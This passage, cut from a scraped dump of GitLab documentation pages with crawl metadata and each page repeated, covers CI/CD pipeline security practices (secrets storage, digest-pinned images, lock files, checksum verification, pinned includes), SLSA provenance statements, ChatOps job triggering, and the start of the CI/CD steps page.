branch: main` is **invalid**. The `if:` clause evaluates to `if: $CI_COMMIT_REF_NAME == main`, which is invalid because `main` is a string but is not quoted. Alternatively, add quotes to resolve some variable expression issues. For example: ```yaml spec: inputs: environment: default: "$ENVIRONMENT" --- $[[ inputs.environment | expand_vars ]] job: script: echo rules: - if: '"$[[ inputs.environment | expand_vars ]]" == "production"' ``` In this example, quoting the input block and also the entire variable expression ensures valid `if:` syntax after the input is evaluated. The internal and external quotes in the expression must not be the same character. You can use `"` for the internal quotes and `'` for the external quotes, or the inverse. On the other hand, the job name does not require any quoting.
https://docs.gitlab.com/ci/pipeline_security
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/pipeline_security
[ "doc", "ci", "pipeline_security" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Pipeline security
Secrets management, job tokens, secure files, and cloud security.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} ## Secrets Management Secrets management is the systems that developers use to securely store sensitive data in a secure environment with strict access controls. A **secret** is a sensitive credential that should be kept confidential. Examples of a secret include: - Passwords - SSH keys - Access tokens - Any other types of credentials where exposure would be harmful to an organization ## Secrets storage ### Secrets management providers Secrets that are the most sensitive and under the strictest policies should be stored in a secrets manager. When using a secrets manager solution, secrets are stored outside of the GitLab instance. There are a number of providers in this space, including [HashiCorp's Vault](https://www.vaultproject.io), [Azure Key Vault](https://azure.microsoft.com/en-us/products/key-vault), and [Google Cloud Secret Manager](https://cloud.google.com/security/products/secret-manager). You can use the GitLab native integrations for certain [external secret management providers](../secrets/_index.md) to retrieve those secrets in CI/CD pipelines when they are needed. ### CI/CD variables [CI/CD Variables](../variables/_index.md) are a convenient way to store and reuse data in a CI/CD pipeline, but variables are less secure than secrets management providers. Variable values: - Are stored in the GitLab project, group, or instance settings. Users with access to the settings have access to variables values that are not [hidden](../variables/_index.md#hide-a-cicd-variable). - Can be [overridden](../variables/_index.md#use-pipeline-variables), making it hard to determine which value was used. - Can be exposed by accidental pipeline misconfiguration. Information suitable for storage in a variable should be data that can be exposed without risk of exploitation (non-sensitive). Sensitive data should be stored in a secrets management solution. If you don't have a secrets management solution and want to store sensitive data in a CI/CD variable, be sure to always: - [Mask the variables](../variables/_index.md#mask-a-cicd-variable). - [Hide the variables](../variables/_index.md#hide-a-cicd-variable). - [Protect the variables](../variables/_index.md#protect-a-cicd-variable) when possible. ## Pass parameters to CI/CD pipelines For passing parameters to CI/CD pipelines, use [CI/CD inputs](../inputs/_index.md) instead of pipeline variables. Inputs provide: - Type-safe validation at pipeline creation. - Explicit parameter contracts. - Scoped availability that enhances security. Consider [disabling pipeline variables](../variables/_index.md#restrict-pipeline-variables) when implementing inputs to prevent security vulnerabilities, because pipeline variables: - Lack type validation. - Can override predefined variables causing unexpected behavior. - Share the same permission scope as sensitive secrets. ## Pipeline Integrity The key security principles of ensuring pipeline integrity include: - **Supply Chain Security**: Assets should be obtained from trusted sources and their integrity verified. - **Reproducibility**: Pipelines should produce consistent results when using the same inputs. - **Auditability**: All pipeline dependencies should be traceable and their provenance verifiable. - **Version Control**: Changes to pipeline dependencies should be tracked and controlled. ### Docker images Always use SHA digests for Docker images to ensure client-side integrity verification. For example: - Node: - Use: `image: node@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef` - Instead of: `image: node:latest` - Python: - Use `image: python@sha256:9876543210abcdef9876543210abcdef9876543210abcdef9876543210abcdef` - Instead of: `image: python:3.9` You can find the SHA digest of an image with a specific tag using: ```shell docker pull node:18.17.1 docker images --digests node:18.17.1 ``` Prefer to pull from container registries that protect image integrity: - Use [protected container repositories](../../user/packages/container_registry/container_repository_protection_rules.md) to restrict which users can make changes to container images in your container repository. - Use [protected tags](../../user/packages/container_registry/protected_container_tags.md) to control who can push and delete container tags. When possible, avoid using variables in container references as they can be modified to point to malicious images. For example: - Prefer: - `image: my-registry.example.com/node:18.17.1` - Instead of: - `image: ${CUSTOM_REGISTRY}/node:latest` - `image: node:${VERSION}` ### Package dependencies You should lock down package dependencies in your jobs. Use exact versions, defined in lock files: - npm: - Use: `npm ci` - Instead of: `npm install` - yarn: - Use: `yarn install --frozen-lockfile` - Instead of: `yarn install` - Python: - Use: - `pip install -r requirements.txt --require-hashes` - `pip install -r requirements.lock` - Instead of: `pip install -r requirements.txt` - Go: - Use exact versions from `go.sum`: - `go mod verify` - `go mod download` - Instead of: `go get ./...` For example, in a CI/CD job: ```yaml javascript-job: script: - npm ci ``` ### Shell commands and scripts When installing tools in a job, always specify and verify exact versions. For example, in a Terraform job: ```yaml terraform_job: script: # Download specific version - | wget https://releases.hashicorp.com/terraform/1.5.7/terraform_1.5.7_linux_amd64.zip # IMPORTANT: Always verify checksums echo "c0ed7bc32ee52ae255af9982c8c88a7a4c610485cf1d55feeb037eab75fa082c terraform_1.5.7_linux_amd64.zip" | sha256sum -c unzip terraform_1.5.7_linux_amd64.zip mv terraform /usr/local/bin/ # Use the installed version - terraform init - terraform plan ``` ### Version management tools Use version managers when possible: ```yaml node_build: script: # Use nvm to install and use a specific Node version - | nvm install 16.15.1 nvm use 16.15.1 - node --version # Verify version - npm ci - npm run build ``` ### Included configurations When using the [`include` keyword](../yaml/_index.md#include) to add configuration or CI/CD components to your pipeline, use a specific ref when possible. For example: ```yaml include: - project: 'my-group/my-project' ref: 8b0c8b318857c8211c15c6643b0894345a238c4e # Pin to a specific commit file: '/templates/build.yml' - project: 'my-group/security' ref: v2.1.0 # Pin to a protected tag file: '/templates/scan.yml' - component: 'my-group/security-scans' # Pin to a specific version version: '1.2.3' ``` Avoid versionless includes: ```yaml include: - project: 'my-group/my-project' # Unsafe file: '/templates/build.yml' - component: 'my-group/security-scans' # Unsafe - remote: 'https://example.com/security-scan.yml' # Unsafe ``` Instead of including remote files, download the file and save it in your repository. Then you can include the local copy: ```yaml include: - local: '/ci/security-scan.yml' # Verified and stored in the repository ``` ### Related topics 1. [CIS Docker Benchmarks](https://www.cisecurity.org/benchmark/docker) 1. Google Cloud: [Design secure deployment pipelines](https://cloud.google.com/architecture/design-secure-deployment-pipelines-bp)
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Pipeline security description: Secrets management, job tokens, secure files, and cloud security. breadcrumbs: - doc - ci - pipeline_security --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} ## Secrets Management Secrets management is the systems that developers use to securely store sensitive data in a secure environment with strict access controls. A **secret** is a sensitive credential that should be kept confidential. Examples of a secret include: - Passwords - SSH keys - Access tokens - Any other types of credentials where exposure would be harmful to an organization ## Secrets storage ### Secrets management providers Secrets that are the most sensitive and under the strictest policies should be stored in a secrets manager. When using a secrets manager solution, secrets are stored outside of the GitLab instance. There are a number of providers in this space, including [HashiCorp's Vault](https://www.vaultproject.io), [Azure Key Vault](https://azure.microsoft.com/en-us/products/key-vault), and [Google Cloud Secret Manager](https://cloud.google.com/security/products/secret-manager). You can use the GitLab native integrations for certain [external secret management providers](../secrets/_index.md) to retrieve those secrets in CI/CD pipelines when they are needed. ### CI/CD variables [CI/CD Variables](../variables/_index.md) are a convenient way to store and reuse data in a CI/CD pipeline, but variables are less secure than secrets management providers. Variable values: - Are stored in the GitLab project, group, or instance settings. Users with access to the settings have access to variables values that are not [hidden](../variables/_index.md#hide-a-cicd-variable). - Can be [overridden](../variables/_index.md#use-pipeline-variables), making it hard to determine which value was used. - Can be exposed by accidental pipeline misconfiguration. Information suitable for storage in a variable should be data that can be exposed without risk of exploitation (non-sensitive). Sensitive data should be stored in a secrets management solution. If you don't have a secrets management solution and want to store sensitive data in a CI/CD variable, be sure to always: - [Mask the variables](../variables/_index.md#mask-a-cicd-variable). - [Hide the variables](../variables/_index.md#hide-a-cicd-variable). - [Protect the variables](../variables/_index.md#protect-a-cicd-variable) when possible. ## Pass parameters to CI/CD pipelines For passing parameters to CI/CD pipelines, use [CI/CD inputs](../inputs/_index.md) instead of pipeline variables. Inputs provide: - Type-safe validation at pipeline creation. - Explicit parameter contracts. - Scoped availability that enhances security. Consider [disabling pipeline variables](../variables/_index.md#restrict-pipeline-variables) when implementing inputs to prevent security vulnerabilities, because pipeline variables: - Lack type validation. - Can override predefined variables causing unexpected behavior. - Share the same permission scope as sensitive secrets. ## Pipeline Integrity The key security principles of ensuring pipeline integrity include: - **Supply Chain Security**: Assets should be obtained from trusted sources and their integrity verified. - **Reproducibility**: Pipelines should produce consistent results when using the same inputs. - **Auditability**: All pipeline dependencies should be traceable and their provenance verifiable. - **Version Control**: Changes to pipeline dependencies should be tracked and controlled. ### Docker images Always use SHA digests for Docker images to ensure client-side integrity verification. For example: - Node: - Use: `image: node@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef` - Instead of: `image: node:latest` - Python: - Use `image: python@sha256:9876543210abcdef9876543210abcdef9876543210abcdef9876543210abcdef` - Instead of: `image: python:3.9` You can find the SHA digest of an image with a specific tag using: ```shell docker pull node:18.17.1 docker images --digests node:18.17.1 ``` Prefer to pull from container registries that protect image integrity: - Use [protected container repositories](../../user/packages/container_registry/container_repository_protection_rules.md) to restrict which users can make changes to container images in your container repository. - Use [protected tags](../../user/packages/container_registry/protected_container_tags.md) to control who can push and delete container tags. When possible, avoid using variables in container references as they can be modified to point to malicious images. For example: - Prefer: - `image: my-registry.example.com/node:18.17.1` - Instead of: - `image: ${CUSTOM_REGISTRY}/node:latest` - `image: node:${VERSION}` ### Package dependencies You should lock down package dependencies in your jobs. Use exact versions, defined in lock files: - npm: - Use: `npm ci` - Instead of: `npm install` - yarn: - Use: `yarn install --frozen-lockfile` - Instead of: `yarn install` - Python: - Use: - `pip install -r requirements.txt --require-hashes` - `pip install -r requirements.lock` - Instead of: `pip install -r requirements.txt` - Go: - Use exact versions from `go.sum`: - `go mod verify` - `go mod download` - Instead of: `go get ./...` For example, in a CI/CD job: ```yaml javascript-job: script: - npm ci ``` ### Shell commands and scripts When installing tools in a job, always specify and verify exact versions. For example, in a Terraform job: ```yaml terraform_job: script: # Download specific version - | wget https://releases.hashicorp.com/terraform/1.5.7/terraform_1.5.7_linux_amd64.zip # IMPORTANT: Always verify checksums echo "c0ed7bc32ee52ae255af9982c8c88a7a4c610485cf1d55feeb037eab75fa082c terraform_1.5.7_linux_amd64.zip" | sha256sum -c unzip terraform_1.5.7_linux_amd64.zip mv terraform /usr/local/bin/ # Use the installed version - terraform init - terraform plan ``` ### Version management tools Use version managers when possible: ```yaml node_build: script: # Use nvm to install and use a specific Node version - | nvm install 16.15.1 nvm use 16.15.1 - node --version # Verify version - npm ci - npm run build ``` ### Included configurations When using the [`include` keyword](../yaml/_index.md#include) to add configuration or CI/CD components to your pipeline, use a specific ref when possible. For example: ```yaml include: - project: 'my-group/my-project' ref: 8b0c8b318857c8211c15c6643b0894345a238c4e # Pin to a specific commit file: '/templates/build.yml' - project: 'my-group/security' ref: v2.1.0 # Pin to a protected tag file: '/templates/scan.yml' - component: 'my-group/security-scans' # Pin to a specific version version: '1.2.3' ``` Avoid versionless includes: ```yaml include: - project: 'my-group/my-project' # Unsafe file: '/templates/build.yml' - component: 'my-group/security-scans' # Unsafe - remote: 'https://example.com/security-scan.yml' # Unsafe ``` Instead of including remote files, download the file and save it in your repository. Then you can include the local copy: ```yaml include: - local: '/ci/security-scan.yml' # Verified and stored in the repository ``` ### Related topics 1. [CIS Docker Benchmarks](https://www.cisecurity.org/benchmark/docker) 1. Google Cloud: [Design secure deployment pipelines](https://cloud.google.com/architecture/design-secure-deployment-pipelines-bp)
https://docs.gitlab.com/ci/pipeline_security/slsa
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/pipeline_security/_index.md
2025-08-13
doc/ci/pipeline_security/slsa
[ "doc", "ci", "pipeline_security", "slsa" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab SLSA
null
This page contains information pertaining to GitLab SLSA support. Related topics: - [Provenance version 1 buildType specification](provenance_v1.md) ### SLSA provenance generation GitLab offers a SLSA Level 1 compliant provenance statement that can be [automatically generated for all build artifacts produced by the GitLab Runner](../../runners/configure_runners.md#artifact-provenance-metadata). This provenance statement is produced by the runner itself. #### Sign and verify SLSA provenance with a CI/CD Component The [GitLab SLSA CI/CD component](https://gitlab.com/explore/catalog/components/slsa) provides configurations for: - Signing runner-generated provenance statements. - Generating [Verification Summary Attestations (VSA)](https://slsa.dev/spec/v1.0/verification_summary) for job artifacts. For more information and example configurations, see the [SLSA Component documentation](https://gitlab.com/components/slsa#slsa-supply-chain-levels-for-software-artifacts).
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab SLSA breadcrumbs: - doc - ci - pipeline_security - slsa --- This page contains information pertaining to GitLab SLSA support. Related topics: - [Provenance version 1 buildType specification](provenance_v1.md) ### SLSA provenance generation GitLab offers a SLSA Level 1 compliant provenance statement that can be [automatically generated for all build artifacts produced by the GitLab Runner](../../runners/configure_runners.md#artifact-provenance-metadata). This provenance statement is produced by the runner itself. #### Sign and verify SLSA provenance with a CI/CD Component The [GitLab SLSA CI/CD component](https://gitlab.com/explore/catalog/components/slsa) provides configurations for: - Signing runner-generated provenance statements. - Generating [Verification Summary Attestations (VSA)](https://slsa.dev/spec/v1.0/verification_summary) for job artifacts. For more information and example configurations, see the [SLSA Component documentation](https://gitlab.com/components/slsa#slsa-supply-chain-levels-for-software-artifacts).
https://docs.gitlab.com/ci/pipeline_security/provenance_v1
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/pipeline_security/provenance_v1.md
2025-08-13
doc/ci/pipeline_security/slsa
[ "doc", "ci", "pipeline_security", "slsa" ]
provenance_v1.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
SLSA provenance specification
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated - Status: Experiment {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/547865) in GitLab 18.3 [with a flag](../../../administration/feature_flags/_index.md) named `slsa_provenance_statement`. Disabled by default. {{< /history >}} {{< alert type="flag" >}} The availability of this feature is controlled by a feature flag. For more information, see the history. This feature is available for testing, but not ready for production use. {{< /alert >}} The [SLSA provenance specification](https://slsa.dev/spec/v1.1/provenance) requires the `buildType` reference to be documented and published. This reference is to assist consumers of GitLab SLSA attestations with parsing specific fields that are unique to GitLab SLSA provenance statements. See the SLSA [`buildType` documentation](https://slsa.dev/spec/v1.1/provenance#builddefinition) for more details. ## `buildType` This official [SLSA Provenance](https://slsa.dev/spec/v1.1/provenance) `buildType` reference: - Describes the execution of a GitLab [CI/CD job](_index.md). - Is hosted and maintained by GitLab. ### Description This `buildType` describes the execution of a workflow that builds a software artifact. {{< alert type="note" >}} Consumers should ignore unrecognized external parameters. Any changes must not change the semantics of existing external parameters. {{< /alert >}} ### External parameters The external parameters: | Field | Value | |--------------|-------| | `source` | The URL of the project. | | `entryPoint` | The name of the CI/CD job that triggered the build. | | `variables` | The names and values of any CI/CD or environment variables available during the build command execution. If the variable is [masked or hidden](../../variables/_index.md) the value of the variable is set to `[MASKED]`. | ### Internal parameters The internal parameters, which are populated by default: | Field | Value | |----------------|-------| | `name` | The name of the runner. | | `executor` | The runner executor. | | `architecture` | The architecture on which the CI/CD job is run. | | `job` | The ID of the CI/CD job that triggered the build. | ### Example This example shows the format of a GitLab-generated provenance statement: ```json { "_type": "https://in-toto.io/Statement/v1", "subject": [ { "name": "artifacts.zip", "digest": { "sha256": "717a1ee89f0a2829cf5aad57054c83615675b04baa913bdc19999d7519edf3f2" } } ], "predicateType": "https://slsa.dev/provenance/v1", "predicate": { "buildDefinition": { "buildType": "<Link to Build Type>", "externalParameters": { "source": "http://gdk.test:3000/root/repo_name", "entryPoint": "build-job", "variables": { "CI_PIPELINE_ID": "576", "CI_PIPELINE_URL": "http://gdk.test:3000/root/repo_name/-/pipelines/576", "CI_JOB_ID": "412", [... additional environment variables ...] "masked_and_hidden_variable": "[MASKED]", "masked_variable": "[MASKED]", "visible_variable": "visible_variable", } }, "internalParameters": { "architecture": "arm64", "executor": "docker", "job": 412, "name": "9-mfdkBG" }, "resolvedDependencies": [ { "uri": "http://gdk.test:3000/root/repo_name", "digest": { "gitCommit": "a288201509dd9a85da4141e07522bad412938dbe" } } ] }, "runDetails": { "builder": { "id": "http://gdk.test:3000/groups/user/-/runners/33", "version": { "gitlab-runner": "4d7093e1" } }, "metadata": { "invocationId": 412, "startedOn": "2025-06-05T01:33:18Z", "finishedOn": "2025-06-05T01:33:23Z" } } } } ```
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: SLSA provenance specification breadcrumbs: - doc - ci - pipeline_security - slsa --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated - Status: Experiment {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/547865) in GitLab 18.3 [with a flag](../../../administration/feature_flags/_index.md) named `slsa_provenance_statement`. Disabled by default. {{< /history >}} {{< alert type="flag" >}} The availability of this feature is controlled by a feature flag. For more information, see the history. This feature is available for testing, but not ready for production use. {{< /alert >}} The [SLSA provenance specification](https://slsa.dev/spec/v1.1/provenance) requires the `buildType` reference to be documented and published. This reference is to assist consumers of GitLab SLSA attestations with parsing specific fields that are unique to GitLab SLSA provenance statements. See the SLSA [`buildType` documentation](https://slsa.dev/spec/v1.1/provenance#builddefinition) for more details. ## `buildType` This official [SLSA Provenance](https://slsa.dev/spec/v1.1/provenance) `buildType` reference: - Describes the execution of a GitLab [CI/CD job](_index.md). - Is hosted and maintained by GitLab. ### Description This `buildType` describes the execution of a workflow that builds a software artifact. {{< alert type="note" >}} Consumers should ignore unrecognized external parameters. Any changes must not change the semantics of existing external parameters. {{< /alert >}} ### External parameters The external parameters: | Field | Value | |--------------|-------| | `source` | The URL of the project. | | `entryPoint` | The name of the CI/CD job that triggered the build. | | `variables` | The names and values of any CI/CD or environment variables available during the build command execution. If the variable is [masked or hidden](../../variables/_index.md) the value of the variable is set to `[MASKED]`. | ### Internal parameters The internal parameters, which are populated by default: | Field | Value | |----------------|-------| | `name` | The name of the runner. | | `executor` | The runner executor. | | `architecture` | The architecture on which the CI/CD job is run. | | `job` | The ID of the CI/CD job that triggered the build. | ### Example This example shows the format of a GitLab-generated provenance statement: ```json { "_type": "https://in-toto.io/Statement/v1", "subject": [ { "name": "artifacts.zip", "digest": { "sha256": "717a1ee89f0a2829cf5aad57054c83615675b04baa913bdc19999d7519edf3f2" } } ], "predicateType": "https://slsa.dev/provenance/v1", "predicate": { "buildDefinition": { "buildType": "<Link to Build Type>", "externalParameters": { "source": "http://gdk.test:3000/root/repo_name", "entryPoint": "build-job", "variables": { "CI_PIPELINE_ID": "576", "CI_PIPELINE_URL": "http://gdk.test:3000/root/repo_name/-/pipelines/576", "CI_JOB_ID": "412", [... additional environment variables ...] "masked_and_hidden_variable": "[MASKED]", "masked_variable": "[MASKED]", "visible_variable": "visible_variable", } }, "internalParameters": { "architecture": "arm64", "executor": "docker", "job": 412, "name": "9-mfdkBG" }, "resolvedDependencies": [ { "uri": "http://gdk.test:3000/root/repo_name", "digest": { "gitCommit": "a288201509dd9a85da4141e07522bad412938dbe" } } ] }, "runDetails": { "builder": { "id": "http://gdk.test:3000/groups/user/-/runners/33", "version": { "gitlab-runner": "4d7093e1" } }, "metadata": { "invocationId": 412, "startedOn": "2025-06-05T01:33:18Z", "finishedOn": "2025-06-05T01:33:23Z" } } } } ```
https://docs.gitlab.com/ci/chatops
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/chatops
[ "doc", "ci", "chatops" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab ChatOps
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use GitLab ChatOps to interact with CI/CD jobs through chat services like Slack. Many organizations use Slack or Mattermost to collaborate, troubleshoot, and plan work. With ChatOps, you can discuss work with your team, run CI/CD jobs, and view job output, all from the same application. ## Slash command integrations You can trigger ChatOps with the [`run` slash command](../../user/project/integrations/gitlab_slack_application.md#slash-commands). The following integrations are available: - [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md) (recommended for Slack) - [Slack slash commands](../../user/project/integrations/slack_slash_commands.md) - [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md) ## ChatOps workflow and CI/CD configuration ChatOps looks for the specified job in the [`.gitlab-ci.yml`](../yaml/_index.md) on the project's default branch. If the job is found, ChatOps creates a pipeline that contains only the specified job. If you set `when: manual`, ChatOps creates the pipeline, but the job doesn't start automatically. A job run with ChatOps has the same functionality as a job run from GitLab. The job can use existing [CI/CD variables](../variables/_index.md#predefined-cicd-variables) like `GITLAB_USER_ID` to perform additional rights validation, but these variables can be [overridden](../variables/_index.md#cicd-variable-precedence). You should set [`rules`](../yaml/_index.md#rules) so the job does not run as part of the standard CI/CD pipeline. ChatOps passes the following [CI/CD variables](../variables/_index.md#predefined-cicd-variables) to the job: - `CHAT_INPUT` - The arguments passed to the `run` slash command. - `CHAT_CHANNEL` - The name of the chat channel the job is run from. - `CHAT_USER_ID` - The chat service ID of the user who runs the job. When the job runs: - If the job completes in less than 30 minutes, ChatOps sends the job output to the chat channel. - If the job completes in more than 30 minutes, you must use a method like the [Slack API](https://api.slack.com/) to send data to the channel. ### Exclude a job from ChatOps To prevent a job from being run from chat: - In `.gitlab-ci.yml`, set the job to `except: [chat]`. ### Customize the ChatOps reply ChatOps sends the output for a job with a single command to the channel as a reply. For example, when the following job runs, the chat reply is `Hello world`: ```yaml stages: - chatops hello-world: stage: chatops rules: - if: $CI_PIPELINE_SOURCE == "chat" script: - echo "Hello World" ``` If the job contains multiple commands, or if `before_script` is set, ChatOps sends the commands and their output to the channel. The commands are wrapped in ANSI color codes. To selectively reply with the output of one command, place the output in a `chat_reply` section. For example, the following job lists the files in the current directory: ```yaml stages: - chatops ls: stage: chatops rules: - if: $CI_PIPELINE_SOURCE == "chat" script: - echo "This command will not be shown." - echo -e "section_start:$( date +%s ):chat_reply\r\033[0K\n$( ls -la )\nsection_end:$( date +%s ):chat_reply\r\033[0K" ``` ## Trigger a CI/CD job using ChatOps Prerequisites: - You must have at least the Developer role for the project. - The project is configured to use a slash command integration. You can run a CI/CD job on the default branch from Slack or Mattermost. The slash command to trigger a CI/CD job depends on which slash command integration is configured for the project. - For the GitLab for Slack app, use `/gitlab <project-name> run <job name> <arguments>`. - For Slack or Mattermost slash commands, use `/<trigger-name> run <job name> <arguments>`. Where: - `<job name>` is the name of the CI/CD job to run. - `<arguments>` are the arguments to pass to the CI/CD job. - `<trigger-name>` is the trigger name configured for the Slack or Mattermost integration. ChatOps schedules a pipeline that contains only the specified job. ## Related topics - [A repository of common ChatOps scripts](https://gitlab.com/gitlab-com/chatops) that GitLab uses to interact with GitLab.com - [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md) - [Slack slash commands](../../user/project/integrations/slack_slash_commands.md) - [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md)
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab ChatOps breadcrumbs: - doc - ci - chatops --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use GitLab ChatOps to interact with CI/CD jobs through chat services like Slack. Many organizations use Slack or Mattermost to collaborate, troubleshoot, and plan work. With ChatOps, you can discuss work with your team, run CI/CD jobs, and view job output, all from the same application. ## Slash command integrations You can trigger ChatOps with the [`run` slash command](../../user/project/integrations/gitlab_slack_application.md#slash-commands). The following integrations are available: - [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md) (recommended for Slack) - [Slack slash commands](../../user/project/integrations/slack_slash_commands.md) - [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md) ## ChatOps workflow and CI/CD configuration ChatOps looks for the specified job in the [`.gitlab-ci.yml`](../yaml/_index.md) on the project's default branch. If the job is found, ChatOps creates a pipeline that contains only the specified job. If you set `when: manual`, ChatOps creates the pipeline, but the job doesn't start automatically. A job run with ChatOps has the same functionality as a job run from GitLab. The job can use existing [CI/CD variables](../variables/_index.md#predefined-cicd-variables) like `GITLAB_USER_ID` to perform additional rights validation, but these variables can be [overridden](../variables/_index.md#cicd-variable-precedence). You should set [`rules`](../yaml/_index.md#rules) so the job does not run as part of the standard CI/CD pipeline. ChatOps passes the following [CI/CD variables](../variables/_index.md#predefined-cicd-variables) to the job: - `CHAT_INPUT` - The arguments passed to the `run` slash command. - `CHAT_CHANNEL` - The name of the chat channel the job is run from. - `CHAT_USER_ID` - The chat service ID of the user who runs the job. When the job runs: - If the job completes in less than 30 minutes, ChatOps sends the job output to the chat channel. - If the job completes in more than 30 minutes, you must use a method like the [Slack API](https://api.slack.com/) to send data to the channel. ### Exclude a job from ChatOps To prevent a job from being run from chat: - In `.gitlab-ci.yml`, set the job to `except: [chat]`. ### Customize the ChatOps reply ChatOps sends the output for a job with a single command to the channel as a reply. For example, when the following job runs, the chat reply is `Hello world`: ```yaml stages: - chatops hello-world: stage: chatops rules: - if: $CI_PIPELINE_SOURCE == "chat" script: - echo "Hello World" ``` If the job contains multiple commands, or if `before_script` is set, ChatOps sends the commands and their output to the channel. The commands are wrapped in ANSI color codes. To selectively reply with the output of one command, place the output in a `chat_reply` section. For example, the following job lists the files in the current directory: ```yaml stages: - chatops ls: stage: chatops rules: - if: $CI_PIPELINE_SOURCE == "chat" script: - echo "This command will not be shown." - echo -e "section_start:$( date +%s ):chat_reply\r\033[0K\n$( ls -la )\nsection_end:$( date +%s ):chat_reply\r\033[0K" ``` ## Trigger a CI/CD job using ChatOps Prerequisites: - You must have at least the Developer role for the project. - The project is configured to use a slash command integration. You can run a CI/CD job on the default branch from Slack or Mattermost. The slash command to trigger a CI/CD job depends on which slash command integration is configured for the project. - For the GitLab for Slack app, use `/gitlab <project-name> run <job name> <arguments>`. - For Slack or Mattermost slash commands, use `/<trigger-name> run <job name> <arguments>`. Where: - `<job name>` is the name of the CI/CD job to run. - `<arguments>` are the arguments to pass to the CI/CD job. - `<trigger-name>` is the trigger name configured for the Slack or Mattermost integration. ChatOps schedules a pipeline that contains only the specified job. ## Related topics - [A repository of common ChatOps scripts](https://gitlab.com/gitlab-com/chatops) that GitLab uses to interact with GitLab.com - [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md) - [Slack slash commands](../../user/project/integrations/slack_slash_commands.md) - [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md)
https://docs.gitlab.com/ci/steps
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/steps
[ "doc", "ci", "steps" ]
_index.md
Verify
Runner
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
CI/CD steps
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated - Status: Experiment {{< /details >}} Steps are reusable units of a job that when composed together replace the `script` used in a GitLab CI/CD job. You are not required to use steps. However, the reusability, composability, testability, and independence of steps make it easier to understand and maintain CI/CD pipeline. To get started, you can try the [Set up steps tutorial](../../tutorials/setup_steps/_index.md). To start creating your own steps, see [Creating your own step](#create-your-own-step). To understand how pipelines can benefit from using both CI/CD Components and CI/CD Steps, see [Combine CI/CD Components and CI/CD Steps](#combine-cicd-components-and-cicd-steps). This experimental feature is still in active development and might have breaking changes at any time. Review the [changelog](https://gitlab.com/gitlab-org/step-runner/-/blob/main/CHANGELOG.md) for full details on any breaking changes. {{< alert type="note" >}} In GitLab Runner 17.11 and later, when you use the Docker executor, GitLab Runner injects the step-runner binary into the build container. For all other executors, ensure that the step-runner binary is in the execution environment. Support for the legacy Docker image `registry.gitlab.com/gitlab-org/step-runner:v0`, maintained by the step runner team, ends in GitLab 18.0. {{< /alert >}} ## Step workflow A step either runs a sequence of steps or executes a command. Each step specifies inputs and outputs, and has access to CI/CD job variables, environment variables, and resources such as the file system and networking. Steps are hosted locally on the file system, in GitLab.com repositories, or in any other Git source. Additionally, steps: - Run in a Docker container created by the Steps team, you can review the [`Dockerfile`](https://gitlab.com/gitlab-org/step-runner/-/blob/main/Dockerfile). Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps will run inside the environment defined by the CI/CD job. - Are specific to Linux. Follow [epic 15074](https://gitlab.com/groups/gitlab-org/-/epics/15074) to track when steps supports multiple operating systems. For example, this job uses the [`run`](../yaml/_index.md#run) CI/CD keyword to run a step: ```yaml job: variables: CI_SAY_HI_TO: "Sally" 